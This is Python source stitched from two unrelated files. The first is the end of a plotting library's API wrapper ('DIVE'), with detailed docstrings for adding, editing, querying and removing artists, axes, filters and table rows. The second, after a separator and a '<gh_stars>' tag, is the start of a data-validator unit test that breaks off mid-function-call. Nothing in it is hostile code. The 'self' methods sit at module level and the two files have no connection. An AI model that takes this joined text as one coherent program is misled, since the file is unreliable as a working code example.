        Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
    legend_text : None, str (Default: None)
        The label to display in the legend for this artist.
        If None, this artist will not appear in the legend.
    x_pos : numeric (Default: 0)
        The position of the rectangle center along the x-axis.
    x_pos_field : None, str (Default: None)
        The name of the field in the data object that contains the positions of the rectangle center along the x-axis.
    y_pos : numeric (Default: 0)
        The position of the rectangle center along the y-axis.
    y_pos_field : None, str (Default: None)
        The name of the field in the data object that contains the positions of the rectangle center along the y-axis.
    edge_width : numeric (Default: 0)
        The width of the rectangle edges.
        If 0, the rectangle edges are not shown.
    edge_width_field : None, str (Default: None)
        The name of the field in the data object that contains width values of the rectangle edges.
    width : numeric (Default: 1)
        The width of the rectangle.
    width_field : None, str (Default: None)
        The name of the field in the data object that contains width values of the rectangle.
    height : numeric (Default: 1)
        The height of the rectangle.
    height_field : None, str (Default: None)
        The name of the field in the data object that contains height values of the rectangle.
    color : str (Default: "g")
        The color to use for the rectangle.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "color_field" is None.
    color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the rectangle.
    colormap: str (Default: "viridis")
        The name of the colormap to use for the rectangle.
        Only used if "color_field" is not None.
    color_label: None, str (Default: None)
        The label to use for rectangle color values on the colorbar.
        Only used if "color_field" is not None.
    color_unit: None, array (Default: None)
        The unit to use for rectangle color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "color_field" is not None.
    edge_color : str (Default: "g")
        The color to use for the rectangle edges.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "edge_color_field" is None.
    edge_color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the rectangle edges.
    edge_colormap: str (Default: "viridis")
        The name of the colormap to use for the rectangle edges.
        Only used if "edge_color_field" is not None.
    edge_color_label: None, str (Default: None)
        The label to use for rectangle edge color values on the colorbar.
        Only used if "edge_color_field" is not None.
    edge_color_unit: None, array (Default: None)
        The unit to use for rectangle edge color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "edge_color_field" is not None.

    Notes
    -----
    When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
    all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
    All colorbar values that aren't numeric or timestamps (with tz),
    will instead be displayed in the legend (as long as "legend_text" is not None).
    It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
    """
    # Hand the artist definition off to the shared DIVE manager, which owns all plotting state.
    self._dive_manager.add_artist(axis_name, 'rectangle', dict(name=name, data_name=data_name, visible=visible, draw_order=draw_order, legend_text=legend_text, x_pos=x_pos, x_pos_field=x_pos_field, y_pos=y_pos, y_pos_field=y_pos_field, edge_width=edge_width, edge_width_field=edge_width_field, width=width, width_field=width_field, height=height, height_field=height_field, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_scatter_artist(self, axis_name, name, data_name, x_field, y_field, z_field=None, label_field=None, label_size=10, visible=True, draw_order=0, label_draw_order=0, legend_text=None, selectable=True,
                       line_width=1, line_color='r', line_color_field=None, line_colormap='viridis', line_color_label=None, line_color_unit=None,
                       marker='o', marker_size=10, marker_color='g', marker_color_field=None, marker_colormap='viridis', marker_color_label=None, marker_color_unit=None,
                       edge_width=0, edge_color='g', edge_color_field=None, edge_colormap='viridis', edge_color_label=None, edge_color_unit=None):
    """
    Add a scatter artist to an axis in DIVE.

    Parameters
    ----------
    axis_name : str
        The name of the axis that this artist should be added to.
    name : str
        The name of this artist.
    data_name : str
        The name of the data object to use for this artist.
    x_field : str
        The name of the field in the data object that contains the x coordinates for this artist.
    y_field : str
        The name of the field in the data object that contains the y coordinates for this artist.
    z_field : None, str (Default: None)
        The name of the field in the data object that contains the z coordinates for this artist.
        If None, this artist will be two-dimensional.
    label_field : None, str (Default: None)
        The name of the field in the data object that contains labels for each data point.
        If None, labels will not be shown.
    label_size : numeric (Default: 10)
        The font size to use for labels.
    visible : bool (Default: True)
        Toggle whether this artist is visible.
    draw_order : numeric (Default: 0)
        The number used to determine the draw order for this artist.
        Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
    label_draw_order : numeric (Default: 0)
        The number used to determine the draw order for labels.
    legend_text : None, str (Default: None)
        The label to display in the legend for this artist.
        If None, this artist will not appear in the legend.
    selectable : bool (Default: True)
        Toggle whether this artist is selectable.
    line_width : numeric (Default: 1)
        The width of the lines.
        If 0, lines are not shown.
    line_color : str (Default: "r")
        The color to use for the lines.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "line_color_field" is None.
    line_color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the lines.
    line_colormap: str (Default: "viridis")
        The name of the colormap to use for the lines.
        Only used if "line_color_field" is not None.
    line_color_label: None, str (Default: None)
        The label to use for line color values on the colorbar.
        Only used if "line_color_field" is not None.
    line_color_unit: None, array (Default: None)
        The unit to use for line color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "line_color_field" is not None.
    marker: str (Default: "o")
        The shape to use for the markers.
    marker_size: numeric (Default: 10)
        The size of the markers.
        If 0, markers are not shown.
    marker_color : str (Default: "g")
        The color to use for the markers.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "marker_color_field" is None.
    marker_color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the markers.
    marker_colormap: str (Default: "viridis")
        The name of the colormap to use for the markers.
        Only used if "marker_color_field" is not None.
    marker_color_label: None, str (Default: None)
        The label to use for marker color values on the colorbar.
        Only used if "marker_color_field" is not None.
    marker_color_unit: None, array (Default: None)
        The unit to use for marker color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "marker_color_field" is not None.
    edge_width : numeric (Default: 0)
        The width of the marker edges.
        If 0, marker edges are not shown.
    edge_color : str (Default: "g")
        The color to use for the marker edges.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "edge_color_field" is None.
    edge_color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the marker edges.
    edge_colormap: str (Default: "viridis")
        The name of the colormap to use for the marker edges.
        Only used if "edge_color_field" is not None.
    edge_color_label: None, str (Default: None)
        The label to use for marker edge color values on the colorbar.
        Only used if "edge_color_field" is not None.
    edge_color_unit: None, array (Default: None)
        The unit to use for marker edge color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "edge_color_field" is not None.

    Notes
    -----
    If the data object has an ID field, lines will only connect points with the same ID.
    When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
    all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
    All colorbar values that aren't numeric or timestamps (with tz),
    will instead be displayed in the legend (as long as "legend_text" is not None).
    It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
    """
    # NOTE: documented defaults for edge_width/edge_color were corrected to
    # match the actual signature defaults (0 and "g").
    self._dive_manager.add_artist(axis_name, 'scatter', dict(name=name, data_name=data_name, x_field=x_field, y_field=y_field, z_field=z_field, label_field=label_field, label_size=label_size, visible=visible, draw_order=draw_order, label_draw_order=label_draw_order, legend_text=legend_text, selectable=selectable,
                                  line_width=line_width, line_color=line_color, line_color_field=line_color_field, line_colormap=line_colormap, line_color_label=line_color_label, line_color_unit=line_color_unit,
                                  marker=marker, marker_size=marker_size, marker_color=marker_color, marker_color_field=marker_color_field, marker_colormap=marker_colormap, marker_color_label=marker_color_label, marker_color_unit=marker_color_unit,
                                  edge_width=edge_width, edge_color=edge_color, edge_color_field=edge_color_field, edge_colormap=edge_colormap, edge_color_label=edge_color_label, edge_color_unit=edge_color_unit))
def add_surface_artist(self, axis_name, name, data_name, x_field, y_field, z_field, visible=True, draw_order=0, legend_text=None, color='g', color_field=None, colormap='viridis', color_label=None, color_unit=None):
    """
    Add a surface artist to an axis in DIVE.

    Parameters
    ----------
    axis_name : str
        The name of the axis that this artist should be added to.
    name : str
        The name of this artist.
    data_name : str
        The name of the data object to use for this artist.
    x_field : str
        The name of the field in the data object that contains the x coordinates for this artist.
        Every value in this field must be a 1D numpy.ndarray.
    y_field : str
        The name of the field in the data object that contains the y coordinates for this artist.
        Every value in this field must be a 1D numpy.ndarray.
    z_field : str
        The name of the field in the data object that contains the z coordinates for this artist.
        Every value in this field must be a 2D numpy.ndarray.
    visible : bool (Default: True)
        Toggle whether this artist is visible.
    draw_order : numeric (Default: 0)
        The number used to determine the draw order for this artist.
        Artists with small "draw_order" values are drawn first.
    legend_text : None, str (Default: None)
        The label to display in the legend for this artist.
        If None, this artist will not appear in the legend.
    color : str (Default: "g")
        The color to use for the surface.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "color_field" is None.
    color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the surface.
    colormap: str (Default: "viridis")
        The name of the colormap to use for the surface.
        Only used if "color_field" is not None.
    color_label: None, str (Default: None)
        The label to use for surface color values on the colorbar.
        Only used if "color_field" is not None.
    color_unit: None, array (Default: None)
        The unit to use for surface color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "color_field" is not None.

    Notes
    -----
    When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
    all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
    All colorbar values that aren't numeric or timestamps (with tz),
    will instead be displayed in the legend (as long as "legend_text" is not None).
    It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
    """
    # Collect the artist settings first, then register them with the manager.
    artist_params = dict(name=name, data_name=data_name, x_field=x_field,
                         y_field=y_field, z_field=z_field, visible=visible,
                         draw_order=draw_order, legend_text=legend_text,
                         color=color, color_field=color_field, colormap=colormap,
                         color_label=color_label, color_unit=color_unit)
    self._dive_manager.add_artist(axis_name, 'surface', artist_params)
def add_table_row(self, data_name, field_name, label, operation, color_criteria=None, blend_colors=False, index=None):
    """
    Add a table row to DIVE.

    Parameters
    ----------
    data_name : str
        The name of the data object to use for this row.
    field_name : str
        The name of the field in the data object to use for this row.
    label : str
        The label to use for this row.
    operation : str
        The operation to perform on the data field.
        There are two kinds of operations: "latest" and any pandas function that can be applied to a pandas.Series (sum, mean, min, max, ...).
        If "latest", the most recent value in the data field will be shown. If there aren't any time values in the data object,
        the last value in the data field will be shown.
    color_criteria : None, array (Default: None)
        The criteria to use for setting the row color.
        If None, an empty list of criteria is used.
        Each element of the array should be an array with the format: [comparison_op, comparison_value, color_str]
        The comparison_op specifies how the row's value should be compared to the comparison_value.
        Allowed values for the comparison_op are: ">", ">=", "==", "!=", "<=", "<", "change"
        If comparison_op is "change", the color_str will be applied every time the row value changes and the comparison_value will be ignored.
        The comparison_op can only be "change" when the data object has a time field and "operation" is "latest".
    blend_colors : bool (Default: False)
        Toggle blending of row colors if multiple color criteria are True at the same time.
    index : None, int (Default: None)
        The index in the table to insert this row.
        If None, this row will be appended to the table.
    """
    # A fresh list per call avoids the mutable-default-argument pitfall,
    # where one shared list would be reused (and possibly mutated) across calls.
    if color_criteria is None:
        color_criteria = []
    self._dive_manager.add_table_row(dict(data_name=data_name, field_name=field_name, label=label, operation=operation, color_criteria=color_criteria, blend_colors=blend_colors, index=index))
def add_text_artist(self, axis_name, name, data_name, text_field, x_field, y_field, z_field=None, visible=True, draw_order=0, legend_text=None, x_anchor='center', y_anchor='center', font_size=12, bold=False, italic=False, color='black', color_field=None, colormap='viridis', color_label=None, color_unit=None):
    """
    Add a text artist to an axis in DIVE.

    Parameters
    ----------
    axis_name : str
        The name of the axis that this artist should be added to.
    name : str
        The name of this artist.
    data_name : str
        The name of the data object to use for this artist.
    text_field : str
        The name of the field in the data object that contains the text values for this artist.
    x_field : str
        The name of the field in the data object that contains the x coordinates for this artist.
    y_field : str
        The name of the field in the data object that contains the y coordinates for this artist.
    z_field : None, str (Default: None)
        The name of the field in the data object that contains the z coordinates for this artist.
        If None, this artist will be two-dimensional.
    visible : bool (Default: True)
        Toggle whether this artist is visible.
    draw_order : numeric (Default: 0)
        The number used to determine the draw order for this artist.
        Artists with small "draw_order" values are drawn before artists with large "draw_order" values.
    legend_text : None, str (Default: None)
        The label to display in the legend for this artist.
        If None, this artist will not appear in the legend.
    x_anchor : str (Default: "center")
        The horizontal anchor for the text.
        Allowed values are: "left", "center", "right"
    y_anchor : str (Default: "center")
        The vertical anchor for the text.
        Allowed values are: "top", "center", "bottom"
    font_size : numeric (Default: 12)
        The font size to use for the text.
    bold : bool (Default: False)
        Toggle whether text is bold.
    italic : bool (Default: False)
        Toggle whether text is italicized.
    color : str (Default: "black")
        The color to use for the text.
        It must be either a hex string (such as "#ff0000") or the name of a CSS color.
        Only used if "color_field" is None.
    color_field: None, str (Default: None)
        The name of the field in the data object that contains color values for the text.
    colormap: str (Default: "viridis")
        The name of the colormap to use for the text.
        Only used if "color_field" is not None.
    color_label: None, str (Default: None)
        The label to use for text color values on the colorbar.
        Only used if "color_field" is not None.
    color_unit: None, array (Default: None)
        The unit to use for text color values on the colorbar.
        If array, it must have the format: [from_unit, to_unit]
        Only "pint" units are valid.
        Only used if "color_field" is not None.

    Notes
    -----
    When multiple color fields are in use in an axis (either in a single artist or across multiple artists),
    all color fields that have the same colormap, color_label, and color_unit will share the same colorbar.
    All colorbar values that aren't numeric or timestamps (with tz),
    will instead be displayed in the legend (as long as "legend_text" is not None).
    It is possible to cycle through the colorbars in an axis by clicking on the colorbar.
    """
    # Hand the artist definition off to the shared DIVE manager, which owns all plotting state.
    self._dive_manager.add_artist(axis_name, 'text', dict(name=name, data_name=data_name, text_field=text_field, x_field=x_field, y_field=y_field, z_field=z_field, visible=visible, draw_order=draw_order, legend_text=legend_text, x_anchor=x_anchor, y_anchor=y_anchor, font_size=font_size, bold=bold, italic=italic, color=color, color_field=color_field, colormap=colormap, color_label=color_label, color_unit=color_unit))
def axis_limits_autoscale(self, name=None):
    """Autoscale axis limits in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis whose limits should be autoscaled; if None, the
        limits of every axis in DIVE are autoscaled.
    """
    self._dive_manager.axis_limits_autoscale(name)
def axis_limits_reset(self, name=None):
    """Restore the limits of one or all axes in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis whose limits should be reset; if None, the limits
        of every axis in DIVE are reset.
    """
    self._dive_manager.axis_limits_reset(name)
def display_axis(self, name=None):
    """Show an axis in the DIVE window.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis to display; if None, no axis is displayed.
    """
    self._dive_manager.display_axis(name)
def display_axis_group(self, name=None):
    """Show an axis group in the DIVE window.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis group to display; if None, no axis group is displayed.
    """
    self._dive_manager.display_axis_group(name)
def edit_artist(self, axis_name, name, **kwargs):
    """Change the parameters of an existing artist in DIVE.

    Parameters
    ----------
    axis_name : str
        The axis containing the artist to modify.
    name : str
        The artist to modify.
    **kwargs
        Any parameter accepted by the function that added the artist,
        except "name".
    """
    self._dive_manager.edit_artist(axis_name, name, kwargs)
def edit_axis(self, name, **kwargs):
    """Change the parameters of an existing axis in DIVE.

    Parameters
    ----------
    name : str
        The axis to modify.
    **kwargs
        Any parameter accepted by add_axis, except "name" and
        "axis_type".
    """
    self._dive_manager.edit_axis(name, kwargs)
def edit_axis_group(self, name, **kwargs):
    """Change the parameters of an existing axis group in DIVE.

    Parameters
    ----------
    name : str
        The axis group to modify.
    **kwargs
        Any parameter accepted by add_axis_group, except "name".
    """
    self._dive_manager.edit_axis_group(name, kwargs)
def edit_data(self, name, **kwargs):
    """Change the parameters of an existing data object in DIVE.

    Parameters
    ----------
    name : str
        The data object to modify.
    **kwargs
        Any parameter accepted by add_data, except "name".
    """
    self._dive_manager.edit_data(name, kwargs)
def edit_filter_custom(self, name, **kwargs):
    """Change the parameters of an existing custom filter group in DIVE.

    Parameters
    ----------
    name : str
        The custom filter group to modify.
    **kwargs
        Any parameter accepted by add_filter_custom, except "name".
    """
    self._dive_manager.edit_filter('custom', name, kwargs)
def edit_filter_id(self, name, **kwargs):
    """Change the parameters of an existing ID filter group in DIVE.

    Parameters
    ----------
    name : str
        The ID filter group to modify.
    **kwargs
        Any parameter accepted by add_filter_id, except "name".
    """
    self._dive_manager.edit_filter('ID', name, kwargs)
def edit_filter_value(self, name, **kwargs):
    """Change the parameters of an existing value filter group in DIVE.

    Parameters
    ----------
    name : str
        The value filter group to modify.
    **kwargs
        Any parameter accepted by add_filter_value, except "name".
    """
    self._dive_manager.edit_filter('value', name, kwargs)
def edit_table_row(self, row_index, **kwargs):
    """Change the parameters of an existing table row in DIVE.

    Parameters
    ----------
    row_index : int
        The index of the table row to modify.
    **kwargs
        Any parameter accepted by add_table_row.
    """
    self._dive_manager.edit_table_row(row_index, kwargs)
def get_animation_direction(self):
    """Report whether DIVE's animation is set to run in reverse.

    Returns
    -------
    bool
        True if the animation is set to run in reverse.
    """
    return self._dive_manager.get_animation_direction()
def get_animation_state(self):
    """Report whether DIVE's animation is currently running.

    Returns
    -------
    bool
        True if the animation is running.
    """
    return self._dive_manager.get_animation_state()
def get_artist(self, axis_name=None, name=None):
    """Look up artist parameters in DIVE.

    Parameters
    ----------
    axis_name : None, str (Default: None)
        The axis containing the artist(s); if None, a dict with the
        parameters of every artist in every axis is returned.
    name : None, str (Default: None)
        The artist to look up; if None, a list with the parameters
        of every artist in the chosen axis is returned.

    Returns
    -------
    None, dict, list
        The requested artist parameters, or None when "axis_name"
        or "name" is invalid.
    """
    return self._dive_manager.get_artist(axis_name, name)
def get_axis(self, name=None):
    """Look up axis parameters in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis to look up; if None, a list with the parameters of
        every axis in DIVE is returned.

    Returns
    -------
    None, dict, list
        The requested axis parameters, or None when "name" is invalid.
    """
    return self._dive_manager.get_axis(name)
def get_axis_group(self, name=None):
    """Look up axis group parameters in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis group to look up; if None, a list with the
        parameters of every axis group in DIVE is returned.

    Returns
    -------
    None, dict, list
        The requested axis group parameters, or None when "name"
        is invalid.
    """
    return self._dive_manager.get_axis_group(name)
def get_current_time(self):
    """Return the animation's current time in DIVE.

    Returns
    -------
    None, numeric, pandas.Timestamp with tz
        The current animation time.
    """
    return self._dive_manager.get_current_time()
def get_data(self, name=None):
    """Look up data object parameters in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The data object to look up; if None, a list with the
        parameters of every data object in DIVE is returned.

    Returns
    -------
    None, dict, list
        The requested data object parameters, or None when "name"
        is invalid.
    """
    return self._dive_manager.get_data(name)
def get_filter_custom(self, name=None):
    """Look up custom filter group parameters in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The custom filter group to look up; if None, a list with
        the parameters of every custom filter group is returned.

    Returns
    -------
    None, dict, list
        The requested custom filter group parameters, or None when
        "name" is invalid.
    """
    return self._dive_manager.get_filter('custom', name)
def get_filter_id(self, name=None):
    """Look up ID filter group parameters in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The ID filter group to look up; if None, a list with the
        parameters of every ID filter group is returned.

    Returns
    -------
    None, dict, list
        The requested ID filter group parameters, or None when
        "name" is invalid.
    """
    return self._dive_manager.get_filter('ID', name)
def get_filter_value(self, name=None):
    """Look up value filter group parameters in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The value filter group to look up; if None, a list with the
        parameters of every value filter group is returned.

    Returns
    -------
    None, dict, list
        The requested value filter group parameters, or None when
        "name" is invalid.
    """
    return self._dive_manager.get_filter('value', name)
def get_filter_custom_indices(self, name=None):
    """Look up the indices of custom filter group(s) in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The custom filter group to look up; if None, a list with
        the indices of every custom filter group is returned.

    Returns
    -------
    None, dict, list
        The requested indices, or None when "name" is invalid.
    """
    return self._dive_manager.get_filter_indices('custom', name)
def get_filter_id_indices(self, name=None):
    """Look up the indices of ID filter group(s) in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The ID filter group to look up; if None, a list with the
        indices of every ID filter group is returned.

    Returns
    -------
    None, dict, list
        The requested indices, or None when "name" is invalid.
    """
    return self._dive_manager.get_filter_indices('ID', name)
def get_filter_indices(self):
    """Return the combined indices of every enabled filter group in DIVE.

    Returns
    -------
    dict
        The combined indices across all enabled filter groups.
    """
    return self._dive_manager.get_filter_indices(None, None)
def get_filter_value_indices(self, name=None):
    """Look up the indices of value filter group(s) in DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The value filter group to look up; if None, a list with the
        indices of every value filter group is returned.

    Returns
    -------
    None, dict, list
        The requested indices, or None when "name" is invalid.
    """
    return self._dive_manager.get_filter_indices('value', name)
def get_interact_mode(self):
    """Return the plotting canvas interaction mode in DIVE.

    Returns
    -------
    str
        The current interaction mode of the plotting canvas.
    """
    return self._dive_manager.get_interact_mode()
def get_recording_state(self):
    """Report whether a recording is in progress in DIVE.

    Returns
    -------
    bool
        True if a recording is in progress.
    """
    return self._dive_manager.get_recording_state()
def get_settings(self):
    """Return the current settings in DIVE.

    Returns
    -------
    dict
        The settings currently in effect.
    """
    return self._dive_manager.get_settings()
def get_table_row(self, index=None):
    """Look up table row parameters in DIVE.

    Parameters
    ----------
    index : None, int (Default: None)
        The table row to look up; if None, a list with the
        parameters of every table row in DIVE is returned.

    Returns
    -------
    None, dict, list
        The requested table row parameters, or None when "index"
        is invalid.
    """
    return self._dive_manager.get_table_row(index)
def get_time_limits(self):
    """Return the animation's time span in DIVE.

    Returns
    -------
    None, numeric, pandas.Timestamp with tz
        The minimum time.
    None, numeric, pandas.Timestamp with tz
        The maximum time.
    """
    return self._dive_manager.get_time_limits()
def record_video(self, file_path, start_time, stop_time, fps=None):
    """Record the DIVE window to an .mp4 video over a time span.

    Parameters
    ----------
    file_path : str
        Destination path (including the file name) for the video.
    start_time : numeric, pandas.Timestamp with tz
        The time value at which the recording starts.
    stop_time : numeric, pandas.Timestamp with tz
        The time value at which the recording stops.
    fps : None, int (Default: None)
        Frames per second for the video; if None, the fps from
        DIVE's settings is used.

    Notes
    -----
    This is a no-op when the "opencv-python" module is not installed.
    """
    self._dive_manager.record_video(file_path, start_time, stop_time, fps)
def remove_artist(self, axis_name=None, name=None):
    """Remove artist(s) from DIVE.

    Parameters
    ----------
    axis_name : None, str (Default: None)
        The axis holding the artist; if None, every artist in every
        axis is removed.
    name : None, str (Default: None)
        The artist to remove; if None, every artist in the chosen
        axis is removed.
    """
    self._dive_manager.remove_artist(axis_name, name)
def remove_axis(self, name=None):
    """Remove axis/axes from DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis to remove; if None, every axis is removed.
    """
    self._dive_manager.remove_axis(name)
def remove_axis_group(self, name=None):
    """Remove axis group(s) from DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The axis group to remove; if None, every axis group is removed.
    """
    self._dive_manager.remove_axis_group(name)
def remove_data(self, name=None):
    """Remove data object(s) from DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The data object to remove; if None, every data object is removed.
    """
    self._dive_manager.remove_data(name)
def remove_filter_custom(self, name=None):
    """Remove custom filter group(s) from DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        The custom filter group to remove; if None, every custom
        filter group is removed.
    """
    self._dive_manager.remove_filter('custom', name)
def remove_filter_id(self, name=None):
    """
    Delete an ID filter group from DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        Name of the ID filter group to delete.
        Pass None to remove every ID filter group.
    """
    manager = self._dive_manager
    manager.remove_filter('ID', name)
def remove_filter_value(self, name=None):
    """
    Delete a value filter group from DIVE.

    Parameters
    ----------
    name : None, str (Default: None)
        Name of the value filter group to delete.
        Pass None to remove every value filter group.
    """
    manager = self._dive_manager
    manager.remove_filter('value', name)
def remove_table_row(self, index=None):
    """
    Delete a table row from DIVE.

    Parameters
    ----------
    index : None, int (Default: None)
        Index of the table row to delete.
        Pass None to remove every table row.
    """
    manager = self._dive_manager
    manager.remove_table_row(index)
def set_animation_direction(self, reverse):
    """
    Choose the playback direction of DIVE's animation.

    Parameters
    ----------
    reverse : bool
        If True, the animation plays in reverse.
    """
    manager = self._dive_manager
    manager.set_animation_direction(reverse)
def set_animation_state(self, running):
    """
    Start or stop DIVE's animation.

    Parameters
    ----------
    running : bool
        If True, the animation runs; if False, it is paused.
    """
    manager = self._dive_manager
    manager.set_animation_state(running)
def set_current_time(self, time):
    """
    Move DIVE's animation to the given time.

    Parameters
    ----------
    time : numeric, pandas.Timestamp with tz
        The time value the animation should jump to.
    """
    manager = self._dive_manager
    manager.set_current_time(time)
def set_interact_mode(self, mode):
    """
    Select how the plotting canvas responds to mouse interaction.

    Parameters
    ----------
    mode : str
        The interaction mode to activate.
        Allowed values are: "pan", "zoom", "rectangle", "ellipse", "lasso"
    """
    manager = self._dive_manager
    manager.set_interact_mode(mode)
def set_settings(self, **kwargs):
    """
    Set the settings in DIVE.

    Parameters
    ----------
    **kwargs
        time_step : numeric
            The number of seconds that the animation should increment for each frame of the animation.
        fps : int
            The number of frames per second that the animation should try to run at.
        hold_time : numeric
            The number of seconds of data prior to the current time that should be displayed for all artists.
            If 0, all data up to the current time will be displayed.
        table_change_time : numeric
            The number of seconds that the table should keep a row color changed if it's "color_criteria" is set to "change".
        timezone : str
            The timezone to use for all time values in DIVE.
            Only "pytz" timezones are valid.
        clock_size : numeric
            The font size to use for the clock below the plotting canvas in DIVE.
        marking : str
            The text to use for the marking below the plotting canvas in DIVE.
        marking_color : str
            The text color to use for the marking below the plotting canvas in DIVE.
        marking_size : numeric
            The font size to use for the marking below the plotting canvas in DIVE.
        gui_theme : str
            The theme to use for DIVE's GUI.
            Allowed values are: "default", "light", "dark"
        canvas_theme : str
            The theme to use for the plotting canvas in DIVE.
            Allowed values are: "light", "dark"
        axis_label_size : numeric
            The font size to use for axis labels.
        axis_tick_size : numeric
            The font size to use for axis ticks.
        apply_limits_filter : bool
            Toggle whether limits (axis, colorbar, time) should be calculated using the current filtered data.
        and_filters : bool
            Toggle whether filter groups in DIVE should be merged using AND.
            If False, filter groups will be merged using OR.

    Notes
    -----
    If the "qdarkstyle" module hasn't been installed, "gui_theme" will be ignored.
    """
    # The keyword arguments are forwarded as one plain dict; validation of
    # individual settings is delegated to the manager.
    self._dive_manager.set_settings(kwargs)
def take_screenshot(self, file_path):
    """
    Save a .png image of the DIVE window.

    Parameters
    ----------
    file_path : str
        Destination path (including the file name) for the image.
    """
    manager = self._dive_manager
    manager.take_screenshot(file_path)
def toggle_toolbar(self, reset=True, autoscale=True, pan=True, zoom=True, selection=True, display_axis=True, config_axes=True, config_axis_groups=True, config_data=True, config_table_rows=True, filter_data=True, settings=True, inspect_data=True, screenshot=True, record=True):
    """
    Toggle the visibility of the toolbar buttons in DIVE.

    Parameters
    ----------
    reset : bool (Default: True)
        Toggle the visibility of the "Reset Axis Limits" button.
    autoscale : bool (Default: True)
        Toggle the visibility of the "Autoscale Axis Limits" button.
    pan : bool (Default: True)
        Toggle the visibility of the "Pan" button.
    zoom : bool (Default: True)
        Toggle the visibility of the "Zoom" button.
    selection : bool (Default: True)
        Toggle the visibility of the selection button and its menu.
    display_axis : bool (Default: True)
        Toggle the visibility of the "Display Axis" button.
    config_axes : bool (Default: True)
        Toggle the visibility of the "Configure Axes/Artists" menu option.
    config_axis_groups : bool (Default: True)
        Toggle the visibility of the "Configure Axis Groups" menu option.
    config_data : bool (Default: True)
        Toggle the visibility of the "Configure Data Selection" menu option.
    config_table_rows : bool (Default: True)
        Toggle the visibility of the "Configure Table Rows" menu option.
    filter_data : bool (Default: True)
        Toggle the visibility of the "Filter Data" button.
    settings : bool (Default: True)
        Toggle the visibility of the "Settings" button.
    inspect_data : bool (Default: True)
        Toggle the visibility of the "Inspect Data" button.
    screenshot : bool (Default: True)
        Toggle the visibility of the "Take Screenshot" button.
    record : bool (Default: True)
        Toggle the visibility of the "Record Video" button.
    """
    # All flags are forwarded as one name->bool dict so the manager can
    # iterate the toolbar widgets generically.
    self._dive_manager.toggle_toolbar(dict(reset=reset, autoscale=autoscale, pan=pan, zoom=zoom, selection=selection, display_axis=display_axis, config_axes=config_axes, config_axis_groups=config_axis_groups, config_data=config_data, config_table_rows=config_table_rows, filter_data=filter_data, settings=settings, inspect_data=inspect_data, screenshot=screenshot, record=record))
|
<gh_stars>1-10
from tests.unit.dataactcore.factories.staging import ObjectClassProgramActivityFactory
from tests.unit.dataactcore.factories.job import SubmissionFactory
from dataactcore.models.jobModels import PublishStatus
from dataactcore.models.lookups import PUBLISH_STATUS, PUBLISH_STATUS_DICT
from tests.unit.dataactvalidator.utils import number_of_errors, insert_submission
_FILE = 'a16_object_class_program_activity'
def populate_publish_status(database):
    """Merge every PublishStatus lookup row into the test database."""
    for status_def in PUBLISH_STATUS:
        row = PublishStatus(publish_status_id=status_def.id,
                            name=status_def.name,
                            description=status_def.desc)
        database.session.merge(row)
    database.session.commit()
def test_value_present(database):
    """A populated gross_outlays_delivered_or_fyb passes without any previous submission."""
    populate_publish_status(database)
    submission = SubmissionFactory()
    row = ObjectClassProgramActivityFactory(submission_id=submission.submission_id)
    assert number_of_errors(_FILE, database, submission=submission, models=[row]) == 0
def test_previous_published(database):
    """gross_outlays_delivered_or_fyb may be null when a published submission shares cgac and fiscal year."""
    populate_publish_status(database)
    prior = SubmissionFactory(publish_status_id=PUBLISH_STATUS_DICT['published'])
    insert_submission(database, prior)
    current = SubmissionFactory(cgac_code=prior.cgac_code,
